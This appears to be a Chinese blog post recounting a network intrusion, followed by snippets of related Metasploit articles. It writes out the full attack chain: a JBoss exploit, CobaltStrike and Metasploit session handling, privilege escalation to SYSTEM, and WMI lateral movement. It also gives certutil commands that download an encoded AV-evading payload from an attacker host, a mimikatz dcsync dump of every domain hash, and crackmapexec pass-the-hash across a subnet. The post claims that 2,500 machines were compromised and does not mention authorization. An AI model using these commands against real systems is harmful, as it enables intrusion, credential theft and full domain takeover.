<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    一次利用 Metasploit 進行特權提權,再到 2500 臺主機的內網域滲透

    一顆小胡椒2022-03-29 15:35:48

    前言

    首先是通過 CVE-2017-12149 拿到了一個口子:

    但其實 Jboss 的這個路徑可以查看到日志 http://redteam.red:9090/status 發現有日志,已經被上傳了 webshell:

    后來通過 Bypass 后使用 powershell 上線到 CobaltStrike:

    利用 Metasploit 特權提權拿到 SYSTEM SHELL

    上線之后通過信息搜集發現有幾百個補丁,通過已知漏洞提權無果:

    隨后吧 CobaltStrike 的 Beacon 互傳到了 Metasploit:

    CS:
    創建監聽器windows/foreign/reverse_http
    執行監聽器 spawn msf
    MSF:
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_http
    

    然后通過 Metasploit 的提權檢測模塊找到了幾個提權 exp :

    run post/multi/recon/local_exploit_suggester
    

    然后利用提權 exp :

    發現用戶沒變,但是當前特權變多了:

    然后直接 getsystem 提權到 SYSTEM:

    最后利用 SYSYEM 身份的把 shell 傳到 Cobaltstrike:

    當前權限就可以抓到密碼了:

    內網滲透

    雖然已經拿到 SYSTEM 會話身份,但是發現沒有域管的進程,結果只能另尋他路!然后用抓到到密碼去噴射域內其他主機:

    然后橫向 wmi 橫向移動:

     proxychains python3 wmiexec.py -shell-type cmd administrator:passwd@xx.xx.0.108 -codec gbk
    

    之后發現 10.xx.0.156 有一個域管的進程:tsklist /v

    并且發現當前機器還有微軟自帶殺毒:

    隨后通過 Golang 做了一下免殺,然后讓目標下載我們的 exe,通過 certutil 下載我們的 exe:

    然后運行發現有問題:

    然后我吧 exe 編碼成 txt:

    certutil -encode main.exe main.txt
    

    然后目標下載 txt 然后解碼再運行:

    certutil.exe -urlcache -split -f http://redteam.red:80/download/main.txt
    certutil -decode main.txt main.exe
    

    直接上線到 CobaltStrike:

    然后先 getsystem 提權到 SYSYEM:

    然后竊取域管的進程:

    隨后查詢域控IP:

    shell net group "Domain Controllers" /domain
    shell ping Controllers Computer (ping 域控機器名即可得到IP)
    

    直接拿到域控:

    最后直接 dcsync dump 域內全部 hash:

    mimikatz lsadump::dcsync /domain:redteam.red /all /csv > c:\hash.txt
    

    這個時候域內數千多個域用戶的 hash 都拿到了,可以進行 pth,此時利用 administrator 的 hash 來對域內機器進行批量執行命令:

    proxychains crackmapexec smb 192.168.0.0/24 -u administrator -H xxxxxxxxxxxxxxxxxxxxx -d psnet.com -x "net user"
    

    最后使用 SharpHound.exe 查看下域內信息:

    execute-assembly /Users/saulgoodman/Downloads/SharpHound.exe -c all
    

    看了看,內網 5000 多個用戶,2500 多臺機器都淪陷,沒啥難度。

    metasploit
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    metasploit淺析
    2023-05-30 09:07:26
    # Available formats are :process_image, :dylib, :dylib_sha1 and :exec. # 替換對應位置內容,查詢知應為rdata區。然后調用payload_generator中的format_payload得到最終的payload可執行程序。其完整內容如下: "\x31\xdb" + # xor ebx,ebx
    在此活動檢查流量之后,我們能通過流量檢測工具識別會話期間所有已執行的命令。現在讓我們在初始階段啟動后檢查流量。在 TCP 握手之后,我們觀察到成功的通信正在進行。檢查的流量顯示它在 SSL 握手后立即開始。然而,在這種情況下,我們會留下精心制作或默認證書的痕跡,這些證書也可以進行調查,這可能會導致基礎設施或受到 IDS/IPS 簽名的攻擊。在此示例中,我們將使用Meterpreter 反向 tcp有效負載來測試我們的規避能力。
    前言對于一名合格的網絡安全從業者來說,Metasploit-framework是必會不可的工具,大大降低了exploit的利用門檻。但在實戰中,復雜的網絡環境以及防火墻策略都會對Metasploit-framework的使用進行干擾。shell_reverse_tcp直接反彈shell,可以直接通過nc接受。
    EXOCET 優于 Metasploit 的“Evasive Payloads”模塊,因為 EXOCET 在 GCM 模式(Galois/Counter 模式)下使用 AES-256。Metasploit 的 Evasion Payloads 使用易于檢測的 RC4 加密。雖然 RC4 可以更快地解密,但 AES-256 很難確定惡意軟件的意圖。
    本文為內測第一周結束后內網學員的學習筆記,后續本公眾號會持續更新其他課程學員學習筆記。對課程感興趣,請添加文末小助手微信咨詢。0x01 MSF安裝和升級 最近mac本機和linux服務器上的msf在執行msfupdate命令以后都出現了不同程度的玄學問題,于是卸了重裝。
    Metasploit 總結
    2020-08-24 11:30:35
    此功能當前是選擇加入的。此模塊利用CVE-2020-9496,并利用未經驗證的XML-RPC接口中的Java反序列化方法。最新的OFBiz版本修復了此漏洞。PR #13998 從 adfoster-R7 大大提高Metasploit工具的速度RPC調用。PR #13961 從dwelch-R7 增加了一個新RHOST_HTTP_URL的選擇,它允許用戶設定值RHOSTS,RPORT以及SSL通過指定單個URL。來自wvu-r7的 PR #14002修復了payload中的回歸問題,在該回歸中,空白壞字符沒有被編碼掉。PR #13974從dwelch-R7修正了一個錯誤認證lib/metasploit/framework/login_scanner/winrm造成的故障與沒有接受的“基本”身份驗證服務器模塊。
    最后的功能是支持 7.3.3 版本之前和之后的兩種解密算法,并且支持 Passphrase 解密(前提是你要知道用戶設置的 Passphrase),這次主要學習了一個河豚解密算法的編寫。舊版本的加解密算法正是使用了河豚算法,這個算法比較容易恢復明文密碼,所以新版本添加了 Passphrase 的 SHA256 數據摘要作為 AES-256-CBC 算法的 Key,增加了解密難度,和 Xshell 的主密碼一樣。
    系統安全第37篇普及Metasploit技術,希望您喜歡
    但其實 Jboss 的這個路徑可以查看到日志
    前言 CobalStrike 與 Metasploit 均是滲透利器,各有所長。前者更適合做穩控平臺,后者則更擅長內網各類探測搜集與漏洞利用。 兩者更需要靈活的聯動,各自相互依托,從而提升滲透的效率。 內置Socks功能 通過Beacon內置的socks功能在VPS上開啟代理端口,打通目標內網通道,之后將本地Metasploit直接帶入目標內網,進行橫向滲透。 當然,也可以把代理設置在其他的
    一顆小胡椒
    暫無描述
      亚洲 欧美 自拍 唯美 另类